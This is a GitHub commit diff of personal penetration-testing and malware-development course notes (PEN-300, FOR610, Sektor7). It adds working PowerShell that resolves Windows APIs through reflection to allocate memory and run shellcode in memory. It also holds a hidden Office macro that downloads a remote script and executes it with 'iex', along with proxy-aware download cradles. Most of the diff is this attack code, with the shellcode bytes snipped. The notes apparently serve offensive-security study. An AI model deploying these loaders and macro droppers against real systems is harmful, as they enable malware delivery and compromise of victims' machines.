Commit 3d37a0d

committed

o9n

1 parent 05d857c commit 3d37a0dCopy full SHA for 3d37a0d

File tree

31 files changed

+284

-78

lines changed

API Hashing.md
F610
P300
S7 - Malware Development Essentials
S7 - Malware Development Intermediate
S7 - Windows Evasion
- 1. Making PE Look More Legit.md
- 2. Hooks Removal and Bypass.md
Sektor7 - Malware Development Intermediate
- 0. Shellcode Examples.md
Sektor7 - Windows Evasion

31 files changed

+284

-78

lines changed

`‎API Hashing.md‎`

Lines changed: 0 additions & 4 deletions

This file was deleted.

`‎FOR610/1. Tools.md‎ renamed to ‎F610/1. Tools.md‎`

File renamed without changes.

`‎FOR610/2. Static Properties Analysis.md‎ renamed to ‎F610/2. Static Properties Analysis.md‎`

File renamed without changes.

`‎FOR610/3. Behavioral Analysis.md‎ renamed to ‎F610/3. Behavioral Analysis.md‎`

File renamed without changes.

`‎FOR610/4. Static Code Analysis.md‎ renamed to ‎F610/4. Static Code Analysis.md‎`

File renamed without changes.

`‎FOR610/5. Maldoc Analysis.md‎ renamed to ‎F610/5. Maldoc Analysis.md‎`

File renamed without changes.

`‎FOR610/6. Unpacking Malware.md‎ renamed to ‎F610/6. Unpacking Malware.md‎`

File renamed without changes.

`‎FOR610/7. Code Injections.md‎ renamed to ‎F610/7. Code Injections.md‎`

File renamed without changes.

`‎FOR610/8. Anti-debugging.md‎ renamed to ‎F610/8. Anti-debugging.md‎`

File renamed without changes.

`‎PEN-300/1. Client Side Code Execution With Office.md‎ renamed to ‎P300/1. Client Side Code Execution With Office.md‎`

Lines changed: 60 additions & 17 deletions

Original file line number	Diff line number	Diff line change
`@@ -123,7 +123,7 @@ Sub Workbook_Open()`
`123`	`123`	`End Sub`
`124`	`124`	```
`125`	`125`	`---`
`126`		`-# Injecting shellcode into powershell.exe`
	`126`	`+# Injecting shellcode into powershell.exe (meh)`
`127`	`127`	```powershell
`128`	`128`	`$Kernel32 = @"`
`129`	`129`	`using System;`
`@@ -163,37 +163,51 @@ Sub Workbook_Open()`
`163`	`163`	`End Sub`
`164`	`164`	```
`165`	`165`
`166`		`-# Resolving WinApi without touching the disk`
	`166`	`+# .NET Framework Reflection (without touching the disk)`
`167`	`167`	```powershell
`168`	`168`	`function LookupFunc {`
`169`		`- Param ($moduleName, $functionName)`
`170`		`- $assem = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')`
`171`		`- $tmp=@()`
`172`		`- $assem.GetMethods() \| ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}`
`173`		`- return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName))`
	`169`	`+ Param ($moduleName, $functionName)`
	`170`	`+ $assembly = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object {`
	`171`	`+ $_.GlobalAssemblyCache -and $_.Location.Split("\\")[-1].Equals("System.dll")`
	`172`	`+ }).gettype("Microsoft.Win32.UnsafeNativeMethods")`
	`173`	`+ $methods = @()`
	`174`	`+ $assembly.getMethods() \| foreach-object {if($_.name -eq "GetProcAddress") {$methods+=$_}}`
	`175`	`+ return $methods[0].Invoke($null, @(($assembly.getMethod("GetModuleHandle")).invoke($null, @($moduleName)), $functionName))`
`174`	`176`	`}`
	`177`	`+`
`175`	`178`	`function getDelegateType {`
`176`		`- Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void])`
`177`		`-$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])`
`178`		`-$type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags('Runtime, Managed')`
`179`		`-$type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed')`
`180`		`-return $type.CreateType()`
	`179`	`+ param([Parameter(position = 0, Mandatory = $true)] [AllowEmptyCollection()] [Type[]] $func,[Parameter(position = 1)] [Type] $delType = [Void])`
	`180`	`+$type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName("ReflectedDelegate")),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule("InMemoryModule", $false).DefineType("MyDelegateType", "Class, Public, Sealed, AnsiClass, AutoClass", [System.MulticastDelegate])`
	`181`	`+$type.DefineConstructor("RTSpecialName, HideBySig, Public", [System.Reflection.CallingConventions]::Standard, $func).SetImplementationFlags("Runtime, Managed")`
	`182`	`+$type.DefineMethod("Invoke", "Public, HideBySig, NewSlot, Virtual", $delType, $func).SetImplementationFlags("Runtime, Managed")`
	`183`	`+return $type.CreateType()`
`181`	`184`	`}`
`182`		`-$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)`
`183`	`185`
`184`		`-[Byte[]] $buf = 0xfc,0xe8,0x82,0x0,0x0,0x0...`
	`186`	`+$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(`
	`187`	`+ (LookupFunc kernel32.dll VirtualAlloc), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))`
	`188`	`+).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x4)`
	`189`	`+`
	`190`	`+[Byte[]] $buf = ....SNIP....`
`185`	`191`
`186`	`192`	`[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)`
`187`	`193`
`188`		`-$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)`
	`194`	`+$ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(`
	`195`	`+ (lookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]))`
	`196`	`+).Invoke($lpMem, [uint32]$buf.Length, 0x20, [ref]0)`
`189`	`197`
`190`		`-[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))).Invoke($hThread, 0xFFFFFFFF)`
	`198`	`+$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(`
	`199`	`+ (LookupFunc kernel32.dll CreateThread), (getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))`
	`200`	`+).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)`
	`201`	`+`
	`202`	`+$ret = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(`
	`203`	`+ (LookupFunc kernel32.dll WaitForSingleObject), (getDelegateType @([IntPtr], [Int32]) ([Int]))`
	`204`	`+).Invoke($hThread, 0xFFFFFFFF)`
`191`	`205`	```
`192`	`206`
`193`	`207`	```vb
`194`	`208`	`Sub Auto_Open()`
`195`	`209`	`Dim str As String`
`196`		`- str = "powershell (New-ObjectSystem.Net.WebClient).DownloadString('URL') \| IEX"`
	`210`	`+ str = "powershell (New-ObjectSystem.Net.WebClient).DownloadString('URL') \| iex"`
`197`	`211`	`Shell str, vbHide`
`198`	`212`	`End Sub`
`199`	`213`
`@@ -204,3 +218,32 @@ End Sub`
`204`	`218`	`Sub Workbook_Open()`
`205`	`219`	`Auto_Open`
`206`	`220`	`End Sub`
	`221`	+```
	`222`	`+`
	`223`	`+# Powershell WebClient shenanigans`
	`224`	+```powershell
	`225`	`+[System.Net.WebRequest]::DefaultWebProxy.GetProxy("http://melnicek.github.io")`
	`226`	+```
	`227`	`+`
	`228`	+```powershell
	`229`	`+$client = New-Object System.Net.WebClient`
	`230`	`+$client.Headers.Add("User-Agent", "UAGENT")`
	`231`	`+$client.DownloadString("URL")`
	`232`	+```
	`233`	`+`
	`234`	+```powershell
	`235`	`+$client = new-object system.net.WebClient`
	`236`	`+$client.proxy = $null`
	`237`	`+$client.DownloadString("URL")`
	`238`	+```
	`239`	`+`
	`240`	+```powershell
	`241`	`+New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS \| Out-Null`
	`242`	`+$keys = Get-ChildItem 'HKU:\'`
	`243`	`+ForEach ($key in $keys) {if ($key.Name -like "S-1-5-21-") {$start = $key.Name.substring(10);break}}`
	`244`	`+$proxyAddr = (Get-ItemProperty -Path "HKU:$start\Software\Microsoft\Windows\CurrentVersion\Internet Settings\").ProxyServer`
	`245`	`+[system.net.webrequest]::DefaultWebProxy = new-object System.Net.WebProxy("http://$proxyAddr")`
	`246`	`+$wc = new-object system.net.WebClient`
	`247`	`+$wc.DownloadString("URL")`
	`248`	+```
	`249`	`+`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 3d37a0d

File tree

31 files changed

31 files changed

`‎API Hashing.md‎`

`‎FOR610/1. Tools.md‎ renamed to ‎F610/1. Tools.md‎`

`‎FOR610/2. Static Properties Analysis.md‎ renamed to ‎F610/2. Static Properties Analysis.md‎`

`‎FOR610/3. Behavioral Analysis.md‎ renamed to ‎F610/3. Behavioral Analysis.md‎`

`‎FOR610/4. Static Code Analysis.md‎ renamed to ‎F610/4. Static Code Analysis.md‎`

`‎FOR610/5. Maldoc Analysis.md‎ renamed to ‎F610/5. Maldoc Analysis.md‎`

`‎FOR610/6. Unpacking Malware.md‎ renamed to ‎F610/6. Unpacking Malware.md‎`

`‎FOR610/7. Code Injections.md‎ renamed to ‎F610/7. Code Injections.md‎`

`‎FOR610/8. Anti-debugging.md‎ renamed to ‎F610/8. Anti-debugging.md‎`

`‎PEN-300/1. Client Side Code Execution With Office.md‎ renamed to ‎P300/1. Client Side Code Execution With Office.md‎`

0 commit comments